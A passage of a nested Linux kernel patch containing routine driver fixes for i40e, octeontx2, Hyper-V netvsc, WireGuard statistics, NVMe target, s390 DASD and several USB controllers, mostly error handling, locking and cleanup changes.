++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
+-				vf->vf_id, ret,
++				"VF %d: Failed to delete cloud filter, err %pe aq_err %s\n",
++				vf->vf_id, ERR_PTR(ret),
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
+-			vf->vf_id, ret,
++			"VF %d: Failed to delete cloud filter, err %pe aq_err %s\n",
++			vf->vf_id, ERR_PTR(ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3774,7 +3774,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	int aq_ret = 0;
+-	int i, ret;
++	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3798,8 +3798,10 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	}
+ 
+ 	cfilter = kzalloc(sizeof(*cfilter), GFP_KERNEL);
+-	if (!cfilter)
+-		return -ENOMEM;
++	if (!cfilter) {
++		aq_ret = -ENOMEM;
++		goto err_out;
++	}
+ 
+ 	/* parse destination mac address */
+ 	for (i = 0; i < ETH_ALEN; i++)
+@@ -3847,13 +3849,13 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 
+ 	/* Adding cloud filter programmed as TC filter */
+ 	if (tcf.dst_port)
+-		ret = i40e_add_del_cloud_filter_big_buf(vsi, cfilter, true);
++		aq_ret = i40e_add_del_cloud_filter_big_buf(vsi, cfilter, true);
+ 	else
+-		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+-	if (ret) {
++		aq_ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
++	if (aq_ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
+-			vf->vf_id, ret,
++			"VF %d: Failed to add cloud filter, err %pe aq_err %s\n",
++			vf->vf_id, ERR_PTR(aq_ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 934c199667b59..5c4a4d3557702 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -1069,6 +1069,7 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 	struct ethhdr *eth_hdr;
+ 	bool new = false;
+ 	int err = 0;
++	u64 vf_num;
+ 	u32 ring;
+ 
+ 	if (!flow_cfg->max_flows) {
+@@ -1081,7 +1082,21 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 	if (!(pfvf->flags & OTX2_FLAG_NTUPLE_SUPPORT))
+ 		return -ENOMEM;
+ 
+-	if (ring >= pfvf->hw.rx_queues && fsp->ring_cookie != RX_CLS_FLOW_DISC)
++	/* Number of queues on a VF can be greater or less than
++	 * the PF's queue count, so there is no need to check the
++	 * queue count if the PF is installing a rule for its VF.
++	 * Below is the expected vf_num value
++	 * based on the ethtool commands.
++	 *
++	 * e.g.
++	 * 1. ethtool -U <netdev> ... action -1  ==> vf_num:255
++	 * 2. ethtool -U <netdev> ... action <queue_num>  ==> vf_num:0
++	 * 3. ethtool -U <netdev> ... vf <vf_idx> queue <queue_num>  ==>
++	 *    vf_num:vf_idx+1
++	 */
++	vf_num = ethtool_get_flow_spec_ring_vf(fsp->ring_cookie);
++	if (!is_otx2_vf(pfvf->pcifunc) && !vf_num &&
++	    ring >= pfvf->hw.rx_queues && fsp->ring_cookie != RX_CLS_FLOW_DISC)
+ 		return -EINVAL;
+ 
+ 	if (fsp->location >= otx2_get_maxflows(flow_cfg))
+@@ -1163,6 +1178,9 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 		flow_cfg->nr_flows++;
+ 	}
+ 
++	if (flow->is_vf)
++		netdev_info(pfvf->netdev,
++			    "Make sure that VF's queue number is within its queue limit\n");
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c724131172f3f..1d2d72c60a12c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1919,6 +1919,8 @@ int otx2_stop(struct net_device *netdev)
+ 	/* Clear RSS enable flag */
+ 	rss = &pf->hw.rss_info;
+ 	rss->enable = false;
++	if (!netif_is_rxfh_configured(netdev))
++		kfree(rss->rss_ctx[DEFAULT_RSS_CONTEXT_GROUP]);
+ 
+ 	/* Cleanup Queue IRQ */
+ 	vec = pci_irq_vector(pf->pdev,
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index d14648558338b..5ea9dc251dd9a 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -821,7 +821,7 @@ axienet_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 		if (lp->features & XAE_FEATURE_FULL_TX_CSUM) {
+ 			/* Tx Full Checksum Offload Enabled */
+ 			cur_p->app0 |= 2;
+-		} else if (lp->features & XAE_FEATURE_PARTIAL_RX_CSUM) {
++		} else if (lp->features & XAE_FEATURE_PARTIAL_TX_CSUM) {
+ 			csum_start_off = skb_transport_offset(skb);
+ 			csum_index_off = csum_start_off + skb->csum_offset;
+ 			/* Tx Partial Checksum Offload Enabled */
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index 89eb4f179a3ce..0285894c892ab 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -2204,9 +2204,6 @@ static int netvsc_vf_join(struct net_device *vf_netdev,
+ 		goto upper_link_failed;
+ 	}
+ 
+-	/* set slave flag before open to prevent IPv6 addrconf */
+-	vf_netdev->flags |= IFF_SLAVE;
+-
+ 	schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
+ 
+ 	call_netdevice_notifiers(NETDEV_JOIN, vf_netdev);
+@@ -2313,16 +2310,18 @@ static struct net_device *get_netvsc_byslot(const struct net_device *vf_netdev)
+ 
+ 	}
+ 
+-	/* Fallback path to check synthetic vf with
+-	 * help of mac addr
++	/* Fallback path to check the synthetic VF with the help of its mac addr.
++	 * Because this function can be called before vf_netdev is
++	 * initialized (NETDEV_POST_INIT), when its perm_addr has not yet been
++	 * copied from dev_addr, also try to match against its dev_addr.
++	 * Note: On Hyper-V and Azure, it's not possible to set a MAC address
++	 * on a VF that matches the MAC of an unrelated NETVSC device.
+ 	 */
+ 	list_for_each_entry(ndev_ctx, &netvsc_dev_list, list) {
+ 		ndev = hv_get_drvdata(ndev_ctx->device_ctx);
+-		if (ether_addr_equal(vf_netdev->perm_addr, ndev->perm_addr)) {
+-			netdev_notice(vf_netdev,
+-				      "falling back to mac addr based matching\n");
++		if (ether_addr_equal(vf_netdev->perm_addr, ndev->perm_addr) ||
++		    ether_addr_equal(vf_netdev->dev_addr, ndev->perm_addr))
+ 			return ndev;
+-		}
+ 	}
+ 
+ 	netdev_notice(vf_netdev,
+@@ -2330,6 +2329,19 @@ static struct net_device *get_netvsc_byslot(const struct net_device *vf_netdev)
+ 	return NULL;
+ }
+ 
++static int netvsc_prepare_bonding(struct net_device *vf_netdev)
++{
++	struct net_device *ndev;
++
++	ndev = get_netvsc_byslot(vf_netdev);
++	if (!ndev)
++		return NOTIFY_DONE;
++
++	/* set slave flag before open to prevent IPv6 addrconf */
++	vf_netdev->flags |= IFF_SLAVE;
++	return NOTIFY_DONE;
++}
++
+ static int netvsc_register_vf(struct net_device *vf_netdev)
+ {
+ 	struct net_device_context *net_device_ctx;
+@@ -2529,15 +2541,6 @@ static int netvsc_probe(struct hv_device *dev,
+ 		goto devinfo_failed;
+ 	}
+ 
+-	nvdev = rndis_filter_device_add(dev, device_info);
+-	if (IS_ERR(nvdev)) {
+-		ret = PTR_ERR(nvdev);
+-		netdev_err(net, "unable to add netvsc device (ret %d)\n", ret);
+-		goto rndis_failed;
+-	}
+-
+-	eth_hw_addr_set(net, device_info->mac_adr);
+-
+ 	/* We must get rtnl lock before scheduling nvdev->subchan_work,
+ 	 * otherwise netvsc_subchan_work() can get rtnl lock first and wait
+ 	 * all subchannels to show up, but that may not happen because
+@@ -2545,9 +2548,23 @@ static int netvsc_probe(struct hv_device *dev,
+ 	 * -> ... -> device_add() -> ... -> __device_attach() can't get
+ 	 * the device lock, so all the subchannels can't be processed --
+ 	 * finally netvsc_subchan_work() hangs forever.
++	 *
++	 * The rtnl lock also needs to be held before rndis_filter_device_add()
++	 * which advertises nvsp_2_vsc_capability / sriov bit, and triggers
++	 * VF NIC offering and registering. If the VF NIC finishes
++	 * register_netdev() earlier, it may cause a name-based config failure.
+ 	 */
+ 	rtnl_lock();
+ 
++	nvdev = rndis_filter_device_add(dev, device_info);
++	if (IS_ERR(nvdev)) {
++		ret = PTR_ERR(nvdev);
++		netdev_err(net, "unable to add netvsc device (ret %d)\n", ret);
++		goto rndis_failed;
++	}
++
++	eth_hw_addr_set(net, device_info->mac_adr);
++
+ 	if (nvdev->num_chn > 1)
+ 		schedule_work(&nvdev->subchan_work);
+ 
+@@ -2581,9 +2598,9 @@ static int netvsc_probe(struct hv_device *dev,
+ 	return 0;
+ 
+ register_failed:
+-	rtnl_unlock();
+ 	rndis_filter_device_remove(dev, nvdev);
+ rndis_failed:
++	rtnl_unlock();
+ 	netvsc_devinfo_put(device_info);
+ devinfo_failed:
+ 	free_percpu(net_device_ctx->vf_stats);
+@@ -2749,6 +2766,8 @@ static int netvsc_netdev_event(struct notifier_block *this,
+ 		return NOTIFY_DONE;
+ 
+ 	switch (event) {
++	case NETDEV_POST_INIT:
++		return netvsc_prepare_bonding(event_dev);
+ 	case NETDEV_REGISTER:
+ 		return netvsc_register_vf(event_dev);
+ 	case NETDEV_UNREGISTER:
+@@ -2784,12 +2803,17 @@ static int __init netvsc_drv_init(void)
+ 	}
+ 	netvsc_ring_bytes = ring_size * PAGE_SIZE;
+ 
++	register_netdevice_notifier(&netvsc_netdev_notifier);
++
+ 	ret = vmbus_driver_register(&netvsc_drv);
+ 	if (ret)
+-		return ret;
++		goto err_vmbus_reg;
+ 
+-	register_netdevice_notifier(&netvsc_netdev_notifier);
+ 	return 0;
++
++err_vmbus_reg:
++	unregister_netdevice_notifier(&netvsc_netdev_notifier);
++	return ret;
+ }
+ 
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index aff39bf3161de..4ea0e155bb0d5 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1583,11 +1583,11 @@ static int ax88179_reset(struct usbnet *dev)
+ 
+ 	*tmp16 = AX_PHYPWR_RSTCTL_IPRL;
+ 	ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL, 2, 2, tmp16);
+-	msleep(200);
++	msleep(500);
+ 
+ 	*tmp = AX_CLK_SELECT_ACS | AX_CLK_SELECT_BCS;
+ 	ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, tmp);
+-	msleep(100);
++	msleep(200);
+ 
+ 	/* Ethernet PHY Auto Detach*/
+ 	ax88179_auto_detach(dev);
+diff --git a/drivers/net/wireguard/device.c b/drivers/net/wireguard/device.c
+index d58e9f818d3b7..895a621c9e267 100644
+--- a/drivers/net/wireguard/device.c
++++ b/drivers/net/wireguard/device.c
+@@ -209,7 +209,7 @@ static netdev_tx_t wg_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 	while (skb_queue_len(&peer->staged_packet_queue) > MAX_STAGED_PACKETS) {
+ 		dev_kfree_skb(__skb_dequeue(&peer->staged_packet_queue));
+-		++dev->stats.tx_dropped;
++		DEV_STATS_INC(dev, tx_dropped);
+ 	}
+ 	skb_queue_splice_tail(&packets, &peer->staged_packet_queue);
+ 	spin_unlock_bh(&peer->staged_packet_queue.lock);
+@@ -227,7 +227,7 @@ err_icmp:
+ 	else if (skb->protocol == htons(ETH_P_IPV6))
+ 		icmpv6_ndo_send(skb, ICMPV6_DEST_UNREACH, ICMPV6_ADDR_UNREACH, 0);
+ err:
+-	++dev->stats.tx_errors;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ 	return ret;
+ }
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index 0b3f0c8435509..a176653c88616 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -416,20 +416,20 @@ dishonest_packet_peer:
+ 	net_dbg_skb_ratelimited("%s: Packet has unallowed src IP (%pISc) from peer %llu (%pISpfsc)\n",
+ 				dev->name, skb, peer->internal_id,
+ 				&peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_frame_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_frame_errors);
+ 	goto packet_processed;
+ dishonest_packet_type:
+ 	net_dbg_ratelimited("%s: Packet is neither ipv4 nor ipv6 from peer %llu (%pISpfsc)\n",
+ 			    dev->name, peer->internal_id, &peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_frame_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_frame_errors);
+ 	goto packet_processed;
+ dishonest_packet_size:
+ 	net_dbg_ratelimited("%s: Packet has incorrect size from peer %llu (%pISpfsc)\n",
+ 			    dev->name, peer->internal_id, &peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_length_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_length_errors);
+ 	goto packet_processed;
+ packet_processed:
+ 	dev_kfree_skb(skb);
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 95c853b59e1da..0d48e0f4a1ba3 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -333,7 +333,8 @@ err:
+ void wg_packet_purge_staged_packets(struct wg_peer *peer)
+ {
+ 	spin_lock_bh(&peer->staged_packet_queue.lock);
+-	peer->device->dev->stats.tx_dropped += peer->staged_packet_queue.qlen;
++	DEV_STATS_ADD(peer->device->dev, tx_dropped,
++		      peer->staged_packet_queue.qlen);
+ 	__skb_queue_purge(&peer->staged_packet_queue);
+ 	spin_unlock_bh(&peer->staged_packet_queue.lock);
+ }
+diff --git a/drivers/nvme/target/fabrics-cmd.c b/drivers/nvme/target/fabrics-cmd.c
+index 43b5bd8bb6a52..d8da840a1c0ed 100644
+--- a/drivers/nvme/target/fabrics-cmd.c
++++ b/drivers/nvme/target/fabrics-cmd.c
+@@ -244,6 +244,8 @@ static void nvmet_execute_admin_connect(struct nvmet_req *req)
+ 		goto out;
+ 	}
+ 
++	d->subsysnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
++	d->hostnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
+ 	status = nvmet_alloc_ctrl(d->subsysnqn, d->hostnqn, req,
+ 				  le32_to_cpu(c->kato), &ctrl);
+ 	if (status)
+@@ -313,6 +315,8 @@ static void nvmet_execute_io_connect(struct nvmet_req *req)
+ 		goto out;
+ 	}
+ 
++	d->subsysnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
++	d->hostnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
+ 	ctrl = nvmet_ctrl_find_get(d->subsysnqn, d->hostnqn,
+ 				   le16_to_cpu(d->cntlid), req);
+ 	if (!ctrl) {
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 04d9b1d4b1ba9..f207de4a87a0f 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -673,18 +673,20 @@ static void dasd_profile_start(struct dasd_block *block,
+ 	 * we count each request only once.
+ 	 */
+ 	device = cqr->startdev;
+-	if (device->profile.data) {
+-		counter = 1; /* request is not yet queued on the start device */
+-		list_for_each(l, &device->ccw_queue)
+-			if (++counter >= 31)
+-				break;
+-	}
++	if (!device->profile.data)
++		return;
++
++	spin_lock(get_ccwdev_lock(device->cdev));
++	counter = 1; /* request is not yet queued on the start device */
++	list_for_each(l, &device->ccw_queue)
++		if (++counter >= 31)
++			break;
++	spin_unlock(get_ccwdev_lock(device->cdev));
++
+ 	spin_lock(&device->profile.lock);
+-	if (device->profile.data) {
+-		device->profile.data->dasd_io_nr_req[counter]++;
+-		if (rq_data_dir(req) == READ)
+-			device->profile.data->dasd_read_nr_req[counter]++;
+-	}
++	device->profile.data->dasd_io_nr_req[counter]++;
++	if (rq_data_dir(req) == READ)
++		device->profile.data->dasd_read_nr_req[counter]++;
+ 	spin_unlock(&device->profile.lock);
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index b23e543b3a3d5..8a2cc0405a4ad 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -1522,6 +1522,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 	unsigned long flags;
+ 	int counter = 0;
+ 
++	local_bh_disable();
+ 	spin_lock_irqsave(&pdev->lock, flags);
+ 
+ 	if (pdev->cdnsp_state & (CDNSP_STATE_HALTED | CDNSP_STATE_DYING)) {
+@@ -1534,6 +1535,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 			cdnsp_died(pdev);
+ 
+ 		spin_unlock_irqrestore(&pdev->lock, flags);
++		local_bh_enable();
+ 		return IRQ_HANDLED;
+ 	}
+ 
+@@ -1550,6 +1552,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 	cdnsp_update_erst_dequeue(pdev, event_ring_deq, 1);
+ 
+ 	spin_unlock_irqrestore(&pdev->lock, flags);
++	local_bh_enable();
+ 
+ 	return IRQ_HANDLED;
+ }
+diff --git a/drivers/usb/dwc2/hcd_intr.c b/drivers/usb/dwc2/hcd_intr.c
+index c9740caa5974b..9e85cbb0c4f15 100644
+--- a/drivers/usb/dwc2/hcd_intr.c
++++ b/drivers/usb/dwc2/hcd_intr.c
+@@ -2015,15 +2015,17 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ {
+ 	struct dwc2_qtd *qtd;
+ 	struct dwc2_host_chan *chan;
+-	u32 hcint, hcintmsk;
++	u32 hcint, hcintraw, hcintmsk;
+ 
+ 	chan = hsotg->hc_ptr_array[chnum];
+ 
+-	hcint = dwc2_readl(hsotg, HCINT(chnum));
++	hcintraw = dwc2_readl(hsotg, HCINT(chnum));
+ 	hcintmsk = dwc2_readl(hsotg, HCINTMSK(chnum));
++	hcint = hcintraw & hcintmsk;
++	dwc2_writel(hsotg, hcint, HCINT(chnum));
++
+ 	if (!chan) {
+ 		dev_err(hsotg->dev, "## hc_ptr_array for channel is NULL ##\n");
+-		dwc2_writel(hsotg, hcint, HCINT(chnum));
+ 		return;
+ 	}
+ 
+@@ -2032,11 +2034,9 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ 			 chnum);
+ 		dev_vdbg(hsotg->dev,
+ 			 "  hcint 0x%08x, hcintmsk 0x%08x, hcint&hcintmsk 0x%08x\n",
+-			 hcint, hcintmsk, hcint & hcintmsk);
++			 hcintraw, hcintmsk, hcint);
+ 	}
+ 
+-	dwc2_writel(hsotg, hcint, HCINT(chnum));
+-
+ 	/*
+ 	 * If we got an interrupt after someone called
+ 	 * dwc2_hcd_endpoint_disable() we don't want to crash below
+@@ -2046,8 +2046,7 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ 		return;
+ 	}
+ 
+-	chan->hcint = hcint;
+-	hcint &= hcintmsk;
++	chan->hcint = hcintraw;
+ 
+ 	/*
+ 	 * If the channel was halted due to a dequeue, the qtd list might
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index a811db88eedae..1f23c96fa94f8 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -2036,6 +2036,8 @@ static int dwc3_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_put(dev);
+ 
++	dma_set_max_seg_size(dev, UINT_MAX);
++
+ 	return 0;
+ 
+ err5:
+diff --git a/drivers/usb/dwc3/drd.c b/drivers/usb/dwc3/drd.c
+index 039bf241769af..57ddd2e43022e 100644
+--- a/drivers/usb/dwc3/drd.c
++++ b/drivers/usb/dwc3/drd.c
+@@ -505,6 +505,7 @@ static int dwc3_setup_role_switch(struct dwc3 *dwc)
+ 		dwc->role_switch_default_mode = USB_DR_MODE_PERIPHERAL;
+ 		mode = DWC3_GCTL_PRTCAP_DEVICE;
+ 	}
++	dwc3_set_mode(dwc, mode);
+ 
+ 	dwc3_role_switch.fwnode = dev_fwnode(dwc->dev);
+ 	dwc3_role_switch.set = dwc3_usb_role_switch_set;
+@@ -526,7 +527,6 @@ static int dwc3_setup_role_switch(struct dwc3 *dwc)
+ 		}
+ 	}
+ 
+-	dwc3_set_mode(dwc, mode);
+ 	return 0;
+ }
+ #else
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 72c22851d7eef..93747ab2cf5b8 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -550,7 +550,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "hs_phy_irq failed: %d\n", ret);
+@@ -565,7 +565,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 DP_HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "dp_hs_phy_irq failed: %d\n", ret);
+@@ -580,7 +580,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 DM_HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "dm_hs_phy_irq failed: %d\n", ret);
+@@ -595,7 +595,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 SS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "ss_phy_irq failed: %d\n", ret);
+@@ -759,6 +759,7 @@ static int dwc3_qcom_of_register_core(struct platform_device *pdev)
+ 	if (!qcom->dwc3) {
+ 		ret = -ENODEV;
+ 		dev_err(dev, "failed to get dwc3 platform device\n");
++		of_platform_depopulate(dev);
+ 	}
+ 
+ node_put:
+@@ -767,9 +768,9 @@ node_put:
+ 	return ret;
+ }
+ 
+-static struct platform_device *
+-dwc3_qcom_create_urs_usb_platdev(struct device *dev)
++static struct platform_device *dwc3_qcom_create_urs_usb_platdev(struct device *dev)
+ {
++	struct platform_device *urs_usb = NULL;
+ 	struct fwnode_handle *fwh;
+ 	struct acpi_device *adev;
+ 	char name[8];
+@@ -789,9 +790,26 @@ dwc3_qcom_create_urs_usb_platdev(struct device *dev)
+ 
+ 	adev = to_acpi_device_node(fwh);
+ 	if (!adev)
+-		return NULL;
++		goto err_put_handle;
++
++	urs_usb = acpi_create_platform_device(adev, NULL);
++	if (IS_ERR_OR_NULL(urs_usb))
++		goto err_put_handle;
++
++	return urs_usb;
++
++err_put_handle:
++	fwnode_handle_put(fwh);
++
++	return urs_usb;
++}
+ 
+-	return acpi_create_platform_device(adev, NULL);
++static void dwc3_qcom_destroy_urs_usb_platdev(struct platform_device *urs_usb)
++{
++	struct fwnode_handle *fwh = urs_usb->dev.fwnode;
++
++	platform_device_unregister(urs_usb);
++	fwnode_handle_put(fwh);
+ }
+ 
+ static int dwc3_qcom_probe(struct platform_device *pdev)
+@@ -876,13 +894,13 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	qcom->qscratch_base = devm_ioremap_resource(dev, parent_res);
+ 	if (IS_ERR(qcom->qscratch_base)) {
+ 		ret = PTR_ERR(qcom->qscratch_base);
+-		goto clk_disable;
++		goto free_urs;
+ 	}
+ 
+ 	ret = dwc3_qcom_setup_irq(pdev);
+ 	if (ret) {
+ 		dev_err(dev, "failed to setup IRQs, err=%d\n", ret);
+-		goto clk_disable;
++		goto free_urs;
+ 	}
+ 
+ 	/*
+@@ -901,7 +919,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 
+ 	if (ret) {
+ 		dev_err(dev, "failed to register DWC3 Core, err=%d\n", ret);
+-		goto depopulate;
++		goto free_urs;
+ 	}
+ 
+ 	ret = dwc3_qcom_interconnect_init(qcom);
+@@ -933,10 +951,16 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ interconnect_exit:
+ 	dwc3_qcom_interconnect_exit(qcom);
+ depopulate:
+-	if (np)
++	if (np) {
+ 		of_platform_depopulate(&pdev->dev);
+-	else
+-		platform_device_put(pdev);
++	} else {
++		device_remove_software_node(&qcom->dwc3->dev);
++		platform_device_del(qcom->dwc3);
++	}
++	platform_device_put(qcom->dwc3);
++free_urs:
++	if (qcom->urs_usb)
++		dwc3_qcom_destroy_urs_usb_platdev(qcom->urs_usb);
+ clk_disable:
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+@@ -955,11 +979,16 @@ static int dwc3_qcom_remove(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	int i;
+ 
+-	device_remove_software_node(&qcom->dwc3->dev);
+-	if (np)
++	if (np) {
+ 		of_platform_depopulate(&pdev->dev);
+-	else
+-		platform_device_put(pdev);
++	} else {
++		device_remove_software_node(&qcom->dwc3->dev);
++		platform_device_del(qcom->dwc3);
++	}
++	platform_device_put(qcom->dwc3);
++
++	if (qcom->urs_usb)
++		dwc3_qcom_destroy_urs_usb_platdev(qcom->urs_usb);
+ 
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index b9dd714a3ae69..7f2aa72d52e65 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -203,8 +203,8 @@ static void option_instat_callback(struct urb *urb);
+ #define DELL_PRODUCT_5829E_ESIM			0x81e4
+ #define DELL_PRODUCT_5829E			0x81e6
+ 
+-#define DELL_PRODUCT_FM101R			0x8213
+-#define DELL_PRODUCT_FM101R_ESIM		0x8215
++#define DELL_PRODUCT_FM101R_ESIM		0x8213
++#define DELL_PRODUCT_FM101R			0x8215
+ 
+ #define KYOCERA_VENDOR_ID			0x0c88
+ #define KYOCERA_PRODUCT_KPC650			0x17da
+@@ -609,6 +609,8 @@ static void option_instat_callback(struct urb *urb);
+ #define UNISOC_VENDOR_ID			0x1782
+ /* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
+ #define TOZED_PRODUCT_LT70C			0x4055
++/* Luat Air72*U series based on UNISOC UIS8910 uses UNISOC's vendor ID */
++#define LUAT_PRODUCT_AIR720U			0x4e00
+ 
+ /* Device flags */
